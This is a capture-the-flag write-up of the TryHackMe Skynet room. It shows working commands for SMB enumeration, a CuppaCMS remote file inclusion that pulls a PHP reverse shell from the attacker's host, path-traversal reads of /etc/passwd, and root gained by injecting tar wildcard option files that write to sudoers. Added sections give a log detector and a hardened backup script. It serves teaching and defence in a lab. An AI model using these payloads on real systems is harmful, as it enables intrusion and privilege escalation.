THM - Skynet – Recursive Pointer – .blog
source link: https://sebport0.github.io/thm-skynet/
In this writeup we will cover the Skynet room from TryHackMe. It was a fun room to do. The trick to get the last flag is amazing. It's an eye opener on how old and well-known tools can be used to bend the rules.
Writeup
I'm not comfortable with guessing. It makes me feel that I'm missing something, but sometimes it just works. In this case, we can guess that there is a miles user somewhere on the system. Of course, the real Miles user could have gone with the nickname IL0r0bot!s and by guessing we would never have found it.
Let's do some scanning:
$nmap -sV $TARGETIP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-12 20:27 -03
Nmap scan report for 10.10.127.59
Host is up (0.34s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
6 open TCP ports, of which:
- 80 says it's an HTTP service. In fact, opening the browser and going to $TARGETIP:80 takes us to a search website.
- 110 is running Dovecot. It's an open source email service for Linux/Unix.
- 445 is running Samba.
Let's see if the Dovecot service has something useful waiting for us. We can connect to it with netcat:
$nc $TARGETIP 110
+OK Dovecot ready.
This link contains a useful selection of commands that we can test. We can't do anything on the POP/IMAP servers if we are not logged in. Maybe our username guess helps us:
USER miles
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.
USER Miles
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.
Or maybe not. Plaintext login is disallowed on this unencrypted connection. Bad luck. Let's put the Samba service to the test. We can connect to it with smbclient:
$smbclient //$TARGETIP/anonymous
Enter WORKGROUP\sam's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 13:04:00 2020
.. D 0 Tue Sep 17 04:20:17 2019
attention.txt N 163 Wed Sep 18 00:04:59 2019
logs D 0 Wed Sep 18 01:42:16 2019
9204224 blocks of size 1024. 5828764 blocks available
For the password, since we are anonymous, just press ENTER. We can see a logs dir and a very interesting attention.txt file. We can read it with
more attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
Interesting. Let's go to the logs folder; maybe it contains default passwords for each user to log in with?
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 01:42:16 2019
.. D 0 Thu Nov 26 13:04:00 2020
log2.txt N 0 Wed Sep 18 01:42:13 2019
log1.txt N 471 Wed Sep 18 01:41:59 2019
log3.txt N 0 Wed Sep 18 01:42:16 2019
9204224 blocks of size 1024. 5828212 blocks available
Of those files, only log1.txt contains something: a list of words. They look like passwords or usernames. We should save it for later.
It looks like we are stuck now. We can't log in to the email service and the Samba service doesn't seem to have more useful stuff. Well, we didn't try anything on the search website. Looking at the source and playing with different search patterns doesn't seem to take us anywhere. Maybe we can try to look for some interesting directories with gobuster?
$gobuster dir -u http://$TARGETIP:80 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.47.159:80
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/04/12 23:04:19 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/.hta (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.47.159/admin/]
/config (Status: 301) [Size: 313] [--> http://10.10.47.159/config/]
/css (Status: 301) [Size: 310] [--> http://10.10.47.159/css/]
/index.html (Status: 200) [Size: 523]
/js (Status: 301) [Size: 309] [--> http://10.10.47.159/js/]
/server-status (Status: 403) [Size: 277]
/squirrelmail (Status: 301) [Size: 319] [--> http://10.10.47.159/squirrelmail/]
===============================================================
2022/04/12 23:07:11 Finished
Squirrelmail? A quick search shows us that SquirrelMail is an email client written in PHP. This is good. If we go to http://$TARGETIP/squirrelmail we'll see a new login page. Maybe we can guess?
Remember the log1.txt file from before. A tool like Burp Suite might be the right choice to try different combinations of user and password, but a custom script or manual trying gets the job done too. I was about to give up when the important.txt file saved me; if we pay attention, we can see the Miles user:
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
Again, I don't like guessing, but when it works, it works. In fact, log1.txt is a list of passwords.
Inside the SquirrelMail site, we can find the Miles inbox. It has three emails. One of them will give us the SMB password. Back to smbclient:
$smbclient -L $TARGETIP -U milesdyson
Enter WORKGROUP\milesdyson's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Checking Dyson's Samba share:
$smbclient //$TARGETIP/milesdyson -U milesdyson
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 06:05:47 2019
.. D 0 Wed Sep 18 00:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 06:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 06:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 06:05:14 2019
notes D 0 Tue Sep 17 06:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 06:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 06:05:14 2019
9204224 blocks of size 1024. 5815708 blocks available
ROFL. I love such nerdy touches.
smb: \> cd notes
Inside notes:
smb: \notes\> ls
. D 0 Tue Sep 17 06:18:40 2019
.. D 0 Tue Sep 17 06:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 06:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 06:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 06:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 06:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 06:01:29 2019
important.txt N 117 Tue Sep 17 06:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 06:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 06:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 06:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 06:01:29 2019
<-- snip -->
9204224 blocks of size 1024. 5813844 blocks available
Look at important.txt. Bingo. We have a secret dir that we can access through the browser. Nothing there, though. Since we are in dir mania, let's fire gobuster again:
$gobuster dir -u http://$TARGETIP/$SECRETDIR -w /usr/share/wordlists/dirb/small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.5.168/$SECRETDIR
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/04/15 17:01:52 Starting gobuster in directory enumeration mode
===============================================================
/administrator (Status: 301) [Size: 335] [--> http://10.10.5.168/$SECRETDIR/administrator/]
Note: the SECRETDIR variable contains the dir that we found in important.txt.
And we have… another login form! We have a CuppaCMS running here. If we try to log in using either of the passwords from before, the login fails. If we look at the login request, we can see a cookie going around:
Cookie: PHPSESSID=f5ivm3unv15b81aav66k4bu1c7
OK, so we are running on PHP here. Maybe we can manipulate the cookie? After a few tests, it turns out that this might not be the best idea.
What if we try to search for vulnerabilities? Exploit-DB shows only one vulnerability. By the way, if we look at the source from the web console we can find the service version inside js/tiny_mce/tiny_mce.js; in this case the version is 3.4.4.
What about Metasploit? A quick search on Metasploit doesn't show anything for Cuppa. We'll have to try the exploit and include a reverse web shell inside the target.
Because I'm using ParrotOS, I can make use of the PHP reverse shell inside /usr/share/webshells/php. Remember to change the script's IP and port to those of your local machine.
Start an HTTP server:
$python3 -m http.server 8080
And start a netcat session on the port configured inside the PHP reverse shell script. In my case it is port 4445:
$nc -lnvp 4445
Make use of the vulnerability to download the reverse shell file to the target server:
http://$TARGET_IP/$SECRETDIR/administrator/alerts/alertConfigField.php?urlConfig=http://$LOCAL_IP:8080/php_reverse_shell.php
If all goes well, we will see something like:
$nc -lnvp 4445
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4445
Ncat: Listening on 0.0.0.0:4445
Ncat: Connection from $TARGETIP.
Ncat: Connection from $TARGETIP:36038.
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
15:59:28 up 25 min, 0 users, load average: 0.00, 0.00, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
It works! But what is going on here? If we look at the Exploit-DB page, we can see that CuppaCMS is vulnerable to PHP code injection: it fetches and executes whatever is referenced by the urlConfig request parameter. Dangerous stuff.
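From the defender's side, the same urlConfig behaviour leaves a clear trace in the web server's access log. The following is an added example, not code from the writeup: it greps constructed access-log lines for alertConfigField.php requests whose urlConfig value is a remote URL or a directory-traversal path (plain or percent-encoded). SECRETDIR_PLACEHOLDER and ATTACKER_IP stand in for real values, and the urlConfig=alerts.php line is an assumed benign local value.

```shell
#!/bin/sh
# Added example, not part of the original writeup. The log lines are constructed;
# SECRETDIR_PLACEHOLDER and ATTACKER_IP are placeholders, urlConfig=alerts.php is
# an assumed legitimate (local, non-traversing) value.

make_sample_log() {
  cat <<'EOF'
10.10.14.3 - - [15/Apr/2022:17:05:01 -0300] "GET /index.html HTTP/1.1" 200 523
10.10.14.3 - - [15/Apr/2022:17:05:40 -0300] "GET /SECRETDIR_PLACEHOLDER/administrator/ HTTP/1.1" 200 4021
10.10.14.3 - - [15/Apr/2022:17:05:55 -0300] "GET /SECRETDIR_PLACEHOLDER/administrator/alerts/alertConfigField.php?urlConfig=alerts.php HTTP/1.1" 200 310
10.10.14.3 - - [15/Apr/2022:17:06:12 -0300] "GET /SECRETDIR_PLACEHOLDER/administrator/alerts/alertConfigField.php?urlConfig=http://ATTACKER_IP:8080/php_reverse_shell.php HTTP/1.1" 200 0
10.10.14.3 - - [15/Apr/2022:17:07:03 -0300] "GET /SECRETDIR_PLACEHOLDER/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 1721
10.10.14.3 - - [15/Apr/2022:17:07:30 -0300] "GET /SECRETDIR_PLACEHOLDER/administrator/alerts/alertConfigField.php?urlConfig=%2e%2e%2f%2e%2e%2fetc%2fcrontab HTTP/1.1" 200 722
EOF
}

# Print every request to alertConfigField.php whose urlConfig value either
# starts with a URL scheme (remote include) or contains a "../" step, raw or
# percent-encoded (local file read). Case-insensitive to catch %2E / HTTP.
flag_cuppa_rfi() {
  grep -Ei 'alertConfigField\.php[?][^" ]*urlConfig=([a-z]+://|[^" ]*(\.\./|%2e%2e%2f))' "$1"
}

# Number of flagged lines, handy for a quick triage count.
count_cuppa_rfi() {
  flag_cuppa_rfi "$1" | wc -l | tr -d ' '
}

# Stand-alone run: write the sample log to a temp file and show the hits.
log=$(mktemp)
make_sample_log > "$log"
flag_cuppa_rfi "$log"
rm -f "$log"
```

On a real host, point flag_cuppa_rfi at the Apache access log instead of the constructed file.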
Going back to the CTF, we have a shell inside our target. This means that we can find the user flag with a quick search:
$ find / -name user.* 2>/dev/null
Now, the root flag is the only one that remains. After some poking around, /etc/crontab shows us something promising:
$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
The crontab shows us that there is a backup.sh script that is run as root every minute. Can we look at it?
$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
It’s making a backup of the entire /var/www/html directory and saving it inside the backups folder as backup.tgz. What now?
Attempting to replace the backup.sh script fails:
$ echo "/bin/sh" > backup.sh
/bin/sh: 32: cannot create backup.sh: Permission denied
Following this excellent writeup from Kahvi0xFF (because I had no clue) shows us the remaining steps and how to exploit the wildcard in the tar command. Crazy stuff. Insane stuff! It's great!
We must move to /var/www/html. Tar is taking every file from there and adding it to the backup, as implied by the *. We can do
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html" > --checkpoint=1
What is this magic? First, we create a privesc.sh script that will add our current user (as we can easily see with the id or whoami commands) to the /etc/sudoers file. VIP access. For what's next, if we take a look at the tar manual page, we can see that --checkpoint-action and --checkpoint are two flags. With the first flag we can tell tar to execute an action on every checkpoint. And what are we telling tar to execute after the first checkpoint? The script that adds our current user to the sudoers! The * wildcard will fool tar into thinking that the checkpoint files are flags! More info on this exploit can be found here.
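The whole chain from the crontab entry to the planted --checkpoint file rests on one detail: the shell expands * into tar's argument list, so a file name is parsed as an option. The following is an added example, not code from the writeup or from Kahvi0xFF: it contrasts the backup.sh pattern with a hardened form that never globs, shows that the hardened archive keeps the option-looking name as an ordinary file while the glob form loses it to option parsing, and adds a pre-flight check a backup job can run before any wildcard reaches tar. The temp directory and file names are constructed; the planted name carries no exec action, so it is harmless.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Everything below is built
# in a scratch directory; the file name "--checkpoint=1" is constructed and,
# with no --checkpoint-action present, only makes tar print progress lines.

make_demo_site() {
  demo=$(mktemp -d)
  mkdir "$demo/site"
  echo '<html>' > "$demo/site/index.html"
  # A data file whose *name* looks like a tar option.
  touch "$demo/site/--checkpoint=1"
  echo "$demo"
}

# Unsafe (backup.sh's pattern): the shell expands * into the argument list,
# so "--checkpoint=1" reaches tar as an option. The entry is silently left
# out of the archive; with an exec action it would run as the cron user.
unsafe_backup() {
  ( cd "$1" && tar cf "$2" * )
}

# Hardened: no glob at all. -C enters the directory, "--" ends option
# parsing, and "." archives everything beneath it as plain paths.
hardened_backup() {
  tar cf "$2" -C "$1" -- .
}

# True when the archive lists the option-looking name as a regular entry.
archive_has_checkpoint_file() {
  tar tf "$1" | grep -q -- '--checkpoint=1'
}

# Pre-flight check: count top-level names beginning with "-" so a job can
# refuse to run (or alert) instead of feeding them to a wildcard.
count_option_like_names() {
  find "$1" -mindepth 1 -maxdepth 1 -name '-*' | wc -l | tr -d ' '
}

# Stand-alone run.
demo=$(make_demo_site)
hardened_backup "$demo/site" "$demo/safe.tar"
unsafe_backup "$demo/site" "$demo/unsafe.tar" 2>/dev/null || true
echo "option-like names in site: $(count_option_like_names "$demo/site")"
rm -rf "$demo"
```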
Now we only need to wait for the cronjob to execute to get root access and read the last flag:
sudo find / -name root.txt
Extras
We can also retrieve /etc/passwd using the Cuppa exploit:
http://$TARGETIP/$SECRETDIR/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
But this does not work with /etc/shadow. Also, we can retrieve /etc/crontab:
http://$TARGETIP/$SECRETDIR/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/crontab